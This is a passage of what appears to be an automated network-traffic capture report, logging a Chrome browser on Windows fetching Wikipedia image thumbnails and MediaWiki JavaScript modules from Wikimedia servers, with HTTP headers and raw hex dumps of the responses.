                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 05:50:31 GMT
                                                                                                                                                                                                                                      etag: d6b7124f1b76fe64612bbb2122055d94
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-length: 3058
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_10_Logo.svg.png
                                                                                                                                                                                                                                      last-modified: Fri, 03 Feb 2023 01:01:11 GMT
                                                                                                                                                                                                                                      age: 43341
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/149
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC3058INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 25 08 03 00 00 00 30 5c 56 f0 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 f1 50 4c 54 45 00 00 00 00 78 d2 00 78 d7 00 78 d5 00 78 d5 00 78 d7 00 78 d6 00 78 d6 00 78 d6 00 78 d5 00 78 d5 00 78 d6 00 77 d6 00 80 d5 00 77 d6 00 78 d6 00 78 d6 00 78 d6 00 79 d6 00 76 d8 00 7a d5 00 78 d7 00 79 d6 00 77 d6 00 78 d5 00 78 d6 00 78 d5 00 78 d6 00 78 d7 00 78 d6 00 74 d1 00 71 e3 00 71 d5 00 78 da 00 7c d8 00 78 d6 00 78 d6 00 78 d6 00 79 d7 00 79 d6 00 78 d6 00 76 d8 00 7b d3 00 78 d6 00 79 d7 00 55 ff 00 78 d6 00 78 d6 00 79 d6 00 77 d7 00 78 d7 00
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR%0\VgAMAa cHRMz&u0`:pQ<PLTExxxxxxxxxxxwwxxxyvzxywxxxxxxtqqx|xxxyyxv{xyUxxywx


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      51192.168.2.1649777185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC420OUTGET /wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1067INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 07:35:19 GMT
                                                                                                                                                                                                                                      etag: 1ed6ffc9ae70986ebe502a64610b0c5d
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Symbol_list_class.svg.png
                                                                                                                                                                                                                                      last-modified: Fri, 14 Jun 2024 17:40:12 GMT
                                                                                                                                                                                                                                      content-length: 1088
                                                                                                                                                                                                                                      age: 37053
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/13410
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1088INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 11 08 03 00 00 00 e3 71 dc f6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 d7 50 4c 54 45 00 00 00 80 00 ff 5d 00 eb 62 00 f4 64 00 f9 67 00 fd 65 00 ff 60 00 ff 00 00 00 4e 00 c1 64 02 f6 68 02 fe 66 00 ff 00 00 00 4c 00 bc 67 01 fe 71 13 fe 77 1c fe 66 00 fe 67 00 ff 00 00 00 36 00 89 66 02 fc 85 34 fd 90 46 fe 67 01 fe 68 00 ff 00 00 00 60 03 ea 74 18 fd 7e 2b fe 69 04 fe 00 00 ff 2c 00 6b 66 00 ff 00 00 00 4e 00 c3 69 05 fe 71 14 fe 67 00 fd 00 00 00 56 00 d6 7a 23 fc 8d 42 fe 66 00 fd 00 00 00 57 00 da 80 2b fd 94 4c fe 67 01 fe 00 00 00 54
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRqgAMAa cHRMz&u0`:pQ<PLTE]bdge`NdhfLgqwfg6f4Fgh`t~+i,kfNiqgVz#BfW+LgT


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      52192.168.2.1649776185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC470OUTGET /wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1077INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_Server_2019_logo_%28official%29.svg.png
                                                                                                                                                                                                                                      last-modified: Wed, 12 Jun 2024 21:08:02 GMT
                                                                                                                                                                                                                                      content-length: 2842
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:52:51 GMT
                                                                                                                                                                                                                                      server: envoy
                                                                                                                                                                                                                                      etag: 8087241e0374ee22ab2b832f25325bf5
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/1
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC2842INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 19 08 03 00 00 00 43 e4 91 26 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 e5 50 4c 54 45 00 00 00 00 00 aa 00 17 87 00 16 88 00 15 89 00 14 8a 00 0f 87 00 14 87 00 16 88 00 15 89 00 15 89 00 15 8a 00 15 89 00 15 88 00 17 8b 00 15 88 00 15 89 00 15 8a 00 14 89 00 15 89 00 15 89 00 16 8a 00 14 89 00 16 88 00 16 89 00 15 89 00 15 89 00 15 89 00 14 88 00 15 88 00 15 8a 00 12 8d 00 13 87 00 15 89 00 15 80 00 15 8a 00 12 92 00 16 88 00 15 89 00 24 92 00 00 80 00 15 89 00 00 80 00 15 89 00 14 89 00 14 85 00 00 ff 00 16 8a 00 15 89 00 15 89 00 15 89 00
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRC&gAMAa cHRMz&u0`:pQ<PLTE$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      53192.168.2.1649779185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC428OUTGET /wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1072INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 19:32:59 GMT
                                                                                                                                                                                                                                      etag: 09c1e368370f7d93b518267cb66de7ee
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Symbol_category_class.svg.png
                                                                                                                                                                                                                                      last-modified: Thu, 13 Jun 2024 00:11:43 GMT
                                                                                                                                                                                                                                      content-length: 1009
                                                                                                                                                                                                                                      age: 80392
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/132905
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1009INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 11 08 03 00 00 00 e3 71 dc f6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 a7 50 4c 54 45 00 00 00 61 49 00 9a 79 00 a7 81 00 ab 84 00 b0 88 00 b3 8a 00 80 80 00 00 00 00 8c 6d 00 af 88 00 b1 89 00 b1 8a 00 00 00 00 96 73 00 b2 8a 00 b2 8b 00 00 00 00 7e 62 00 b2 8a 00 b5 8a 00 00 00 00 11 0b 00 ad 86 00 b2 8a 00 72 5a 00 b3 89 00 00 00 00 95 74 00 b1 8b 00 00 00 00 9f 7c 00 b3 8a 00 9e 7a 00 b2 8a 00 00 00 00 94 73 00 b2 8a 00 00 00 00 6f 57 00 b2 8b 00 00 00 00 05 05 00 ac 85 00 b2 8a 00 b6 86 00 00 00 00 7a 5f 00 b2 8a 00 00 00 00 97 75 00 b1
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRqgAMAa cHRMz&u0`:pQ<PLTEaIyms~brZt|zsoWz_u


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      54192.168.2.1649781185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC786OUTGET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1058INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 11:59:53 GMT
                                                                                                                                                                                                                                      etag: W/"12u7u"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 12:22:01 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&sourcemap=1&version=12u7u
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/108788
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 22854
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC13737INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 67 61 64 67 65 74 2e 52 65 66 65 72 65 6e 63 65 54 6f 6f 6c 74 69 70 73 40 31 66 63 65 62 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 52 45 46 5f 4c 49 4e 4b 5f 53 45 4c 45 43 54 4f 52 3d 77 69 6e 64 6f 77 2e 72 74 5f 52 45 46 5f 4c 49 4e 4b 5f 53 45 4c 45 43 54 4f 52 7c 7c 27 2e 72 65 66 65 72 65 6e 63 65 2c 20 61 5b 68 72 65 66 5e 3d 22 23 43 49 54 45 52 45 46 22 5d 27 2c 43 4f 4d 4d 45 4e 54 45 44 5f 54 45 58 54 5f 43 4c 41 53 53 3d 77 69 6e 64 6f 77 2e 72 74 5f 43 4f 4d 4d 45 4e 54 45 44 5f 54 45 58 54 5f 43 4c 41 53 53 7c 7c 27
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.gadget.ReferenceTooltips@1fceb",function($,jQuery,require,module){(function(){var REF_LINK_SELECTOR=window.rt_REF_LINK_SELECTOR||'.reference, a[href^="#CITEREF"]',COMMENTED_TEXT_CLASS=window.rt_COMMENTED_TEXT_CLASS||'
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC9117INData Raw: 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 49 4e 5f 44 4f 57 4e 29 2e 61 64 64 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 4f 55 54 5f 55 50 29 3b 7d 65 6c 73 65 7b 74 6f 6f 6c 74 69 70 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 49 4e 5f 55 50 29 2e 61 64 64 43 6c 61 73 73 28 43 4c 41 53 53 45 53 2e 46 41 44 45 5f 4f 55 54 5f 44 4f 57 4e 29 3b 7d 74 6f 6f 6c 74 69 70 2e 74 65 2e 72 65 6d 6f 76 65 54 69 6d 65 72 3d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 6f 6f 6c 74 69 70 2e 69 73 50 72 65 73 65 6e 74 29 7b 74 6f 6f 6c 74 69 70 2e 24 65 6c 65 6d 65 6e 74 2e 64 65 74 61 63 68 28 29 3b 74 6f 6f
                                                                                                                                                                                                                                      Data Ascii: ement.removeClass(CLASSES.FADE_IN_DOWN).addClass(CLASSES.FADE_OUT_UP);}else{tooltip.$element.removeClass(CLASSES.FADE_IN_UP).addClass(CLASSES.FADE_OUT_DOWN);}tooltip.te.removeTimer=setTimeout(function(){if(tooltip.isPresent){tooltip.$element.detach();too


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      55192.168.2.1649780185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC558OUTGET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:49:18 GMT
                                                                                                                                                                                                                                      etag: W/"13tqr"
                                                                                                                                                                                                                                      expires: Tue, 07 Jan 2025 17:49:28 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=300, s-maxage=300, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=startup&only=scripts&skin=vector-2022&sourcemap=1&version=13tqr
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/4813
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 62904
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC13765INData Raw: 66 75 6e 63 74 69 6f 6e 20 69 73 43 6f 6d 70 61 74 69 62 6c 65 28 29 7b 72 65 74 75 72 6e 21 21 28 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 27 6c 6f 63 61 6c 53 74 6f 72 61 67 65 27 69 6e 20 77 69 6e 64 6f 77 26 26 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 26 26 50 72 6f 6d 69 73 65 2e 70 72 6f 74 6f 74 79 70 65 5b 27 66 69 6e 61 6c 6c 79 27 5d 26 26 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 27 28 61 20 3d 20 30 29 20 3d 3e 20 61 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 7d 28 29 29 26 26 2f 2e 2f 67 2e 66 6c 61 67 73 3d 3d 3d 27 67 27 29 3b 7d 69 66 28 21
                                                                                                                                                                                                                                      Data Ascii: function isCompatible(){return!!('querySelector'in document&&'localStorage'in window&&typeof Promise==='function'&&Promise.prototype['finally']&&(function(){try{new Function('(a = 0) => a');return true;}catch(e){return false;}}())&&/./g.flags==='g');}if(!
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC16320INData Raw: 42 61 73 65 29 2e 6c 65 6e 67 74 68 2b 32 33 3b 76 61 72 20 6c 65 6e 67 74 68 3d 30 3b 6d 6f 64 75 6c 65 4d 61 70 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6d 6f 64 75 6c 65 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 6c 61 73 74 44 6f 74 49 6e 64 65 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 27 2e 27 29 2c 70 72 65 66 69 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 73 6c 69 63 65 28 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 0a 6c 61 73 74 44 6f 74 49 6e 64 65 78 29 29 2c 73 75 66 66 69 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 73 6c 69 63 65 28 6c 61 73 74 44 6f 74 49 6e 64 65 78 2b 31 29 2c 62 79 74 65 73 41 64 64 65 64 3d 6d 6f 64 75 6c 65 4d 61 70 5b 70 72 65
                                                                                                                                                                                                                                      Data Ascii: Base).length+23;var length=0;moduleMap=Object.create(null);for(var i=0;i<modules.length;i++){var lastDotIndex=modules[i].lastIndexOf('.'),prefix=modules[i].slice(0,Math.max(0,lastDotIndex)),suffix=modules[i].slice(lastDotIndex+1),bytesAdded=moduleMap[pre
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC2683INData Raw: 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 53 69 7a 65 46 69 6c 74 65 72 57 69 64 67 65 74 22 2c 22 31 62 71 37 6d 22 2c 5b 31 38 33 2c 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 53 69 7a 65 46 69 6c 74 65 72 57 69 64 67 65 74 2e 73 74 79 6c 65 73 22 2c 22 6a 6f 7a 68 71 22 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 4d 65 64 69 61 53 65 61 72 63 68 22 2c 22 31 38 35 63 78 22 2c 5b 34 37 2c 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 54 61 62 6c 65 22 2c 22 68 6c 72 69 32 22 2c 5b 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 54 61 67 4d 75 6c 74 69 73 65 6c 65 63 74 57 69 64 67 65 74 22 2c 22 31 79 35 68 71 22 2c 5b 32 30 34 5d 5d
